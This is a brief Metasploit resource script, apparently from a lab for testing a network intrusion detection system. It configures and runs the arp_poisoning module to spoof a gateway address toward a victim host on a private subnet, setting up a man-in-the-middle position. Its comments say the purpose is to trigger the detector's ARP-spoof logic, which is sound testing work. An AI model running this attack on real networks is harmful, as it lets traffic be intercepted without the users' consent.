# Metasploit: ARP cache poisoning (triggers NIDS spoof / ARP logic when enabled).
# Needs a real LAN. Typical MitM setup: SHOSTS = IP you pretend to be (e.g. gateway),
# DHOSTS = victim(s) that receive the spoofed ARP replies. Adjust INTERFACE to match.
#
#   msfconsole -r /home/kali/Desktop/nids_edit_metasploit/metasploit_lab/arp_poison.rc
#
# Module: auxiliary/spoof/arp/arp_poisoning — run `info` in msfconsole for current options.

use auxiliary/spoof/arp/arp_poisoning
set INTERFACE eth0
set DHOSTS 192.168.56.102
set SHOSTS 192.168.56.1
set VERBOSE true
run
